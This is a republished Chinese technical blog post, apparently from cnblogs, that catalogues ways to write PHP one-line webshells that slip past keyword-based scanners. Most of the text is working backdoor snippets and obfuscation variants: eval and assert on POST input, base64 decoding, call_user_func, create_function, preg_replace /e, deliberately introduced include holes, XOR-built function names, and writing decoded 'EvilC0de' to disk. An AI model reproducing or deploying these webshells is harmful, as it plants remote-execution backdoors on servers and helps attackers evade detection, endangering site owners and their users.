webshell查杀
发布日期:2022-03-12 04:49:21 浏览次数:24 分类:技术文章

本文共 2042 字,大约阅读时间需要 6 分钟。

大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖.

 

0×01 字符串上的舞蹈

一般标准的一句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下:

 

@eval ($_POST[xxxxx]);

 

很明显的eval会成为静态特征码Webshell扫描工具的关键字.加上一点小技巧,我们让其动态传入,或者利用base64等编码函数来进行绕过

 

@$_GET[a]($_POST[xxxxx]);

or

 

@base64_decode(base64编码过的eval)

 

当然,扫一眼PHP手册,玩转字符串的函数远不止这些,你可以写一个自定义加解密的函数,或者利用xor,字符串反转,压缩,截断重组等方法来绕过.

另外大多数Webshell的查杀工具很少把assert函数加入到关键字列表中,不过随着使用的人越来越多也不是绝对的,我们也可以用assert替换eval来执行猥琐的功能.

以前在ASP一句话Webshell的变形过程中,打乱和拆分文件也是非常常用的功能,这里也记一笔.用require,include等将字符串拆分再重组.或者将加密好的字符串单独放在任意扩展名文件中,利用解密函数读取文件来执行,这里写一个base64比较简单的例子

file_put_contents(base64_decode(filepath+filename),base64_decode(EvilC0de));

 

字符串的各种猥琐还是很多的,最致命的地方是,如果有基于语义分析的查杀工具露面(我印象中是有的)这些都完蛋 –__-!

0×02 利用PHP函数的一些特性

这一小段其实还是建立在玩转了字符串的基础上的,一个小例子

if(key($_GET)=='xxxxxx')call_user_func($_GET[xxx],$_POST[evil]);

好吧,我承认这有点换汤不换药,这种类型的就是遇到WAF都挂b,因为基本上都是基于动态传入参数的,然后利用PHP函数换了个形式执行而已,最终还是调用eval,下面是一个小小的延伸

$x=create_function('',$_GET[x]); $x();

再扫一眼PHP手册,我们在《高级PHP漏洞审计》读到过还有其他一些带有执行功能的函数,比如经常用的preg_replace加/e参数的黄金组合,这类一句话Webshell也算是比较常见的了.总结起来他们可以算作是人为的构造一些PHP代码上的漏洞.比如

$f=$_GET[x];include($f);

这样构造一个包含漏洞出来,或者

$s= copy,movefile ; //…. etc$s(参数调用)比如copy($_FILES[t][src],$_FILES[t][dst]);

利用一些文件操作函数来猥琐一些小动作,再或者来个preg_replace执行漏洞的经典例子

$t= prege_replace;$t("/[xxx]/e",$_POST[x],"Hah!~");

这一方面能发散的地方还有很多,还是得多瞅瞅PHP手册,因为PHP的相关函数真是太猥琐了.

0×03 利用PHP的一些魔法特性

  不知道能不能把PHP的多态性叫做魔法特性,错误之处还请指出.看过Ryat和Qz牛的文章后会更好理解,老外给过一个经典的例子

 

($_=@$_GET[2]).@$_($_POST[1]);

and

 

$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

or

${'_'.$_}['_'](${'_'.$_}['__']);

当然我们实际不会这么去写,因为管理员瞅一眼就明白你是要做坏事了.这其中也结合了移位运算等,算是写得很花哨了 – -~

经常用MVC之类的框架搞开发,都能发现__autoload函数的好处,自己文件名去new一个类,然后在类中你可以在构造函数做点手脚什么的,而这一类函数在PHP中也是有不少的,我们可以猥琐一下加以利用.

另外常见的ob_start等利用PHP函数的回调特性也是有的,其实觉得应该把这个分类放到上一小节,之前和wulin牛也讨论过这种方式加密过的马的解密,不过现在大多数Webshell查杀工具都应该把它加到关键字了吧.

 

0×04 未完结

我一直相信还有更加猥琐的方式等等,攻防对立,也可以参考 核攻击

大牛在其lcx.cc上发布的讨论怎么从一万多个文件中快速定位Webshell来见招拆招.引用黑防之前一句很装13的话作为结语:在攻与防的对立中寻求统一.欢迎更多同学加入讨论~

转载于:https://www.cnblogs.com/Reverser/p/5136201.html

转载地址:https://blog.csdn.net/weixin_30348519/article/details/98122688 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!

上一篇:Linux内核源代码分析方法
下一篇:装饰器

发表评论

最新留言

表示我来过!
[***.240.166.169]2024年03月17日 17时54分31秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章

oracle存储过程调用sql文件,oracle - 在SQL Developer中运行存储过程? 2019-04-21
oracle同时报604和12507,V$SES_OPTIMIZER_ENV 查不到刚修改的隐含参数, 2019-04-21
zblog的php更换域名,zblogphp更换域名后,原zblog里使用了固定域名,登录不进去怎么办... 2019-04-21
oracle dnfs 配置,Source of Oracle参数解析(dnfs_batch_size) - django-\/\/ i K | 2019-04-21
oracle所需的环境,转:面对一个全新的oracle环境,首先应该了解什么? 2019-04-21
linux 小数四则运行,shell四则运算(整数及浮点数)的方法介绍 2019-04-21
linux系统分区后进入紧急模式,Linux系统的救援模式应用详解 2019-04-21
linux配置匿名ftp服务器,在Linux环境中使用vsftpd搭建ftp实现匿名上传详细配置 2019-04-21
linux创建硬盘分区lvm,LVM创建及分区调整、更换LVM硬盘 2019-04-21
FreeBSD可以安装Linux软件吗,在Linux服务器上面通过网络安装FreeBSD 2019-04-21
.net core linux 桌面应用,C# dotnet core + AvaloniaUI 开发桌面软件,hello world 2019-04-21
linux tcp 113错误,linux系统报tcp_mark_head_lost错误的处理方法 2019-04-21
南昌工程学院c语言答案,南昌工程学院C语言程序设计基础课件第3讲运算符和表达式... 2019-04-21
python学画画_python学画画(下) 2019-04-21
云栖社区 mysql_【直播结束,已更新回放】PG、MySQL到底哪个好?云栖说这次请来五位专家撕了一下-阿里云开发者社区... 2019-04-21
老男孩mysql 百度云_英语语录:除了你,没人能掌控你的幸福 2019-04-21
mysql驱动多次执行问题_Laravel5.2队列驱动expire参数设置带来的重复执行问题 数据库驱动... 2019-04-21
mysql获取刚新增的数据库_如何取得刚插入数据库的数据的id mysql 2019-04-21
python将10到1递减_(Python)如何将3个递减列表合并成一个递减列表? 2019-04-21
python脚本怎么用来处理数据_长时间运行数据处理python脚本的程序结构 2019-04-21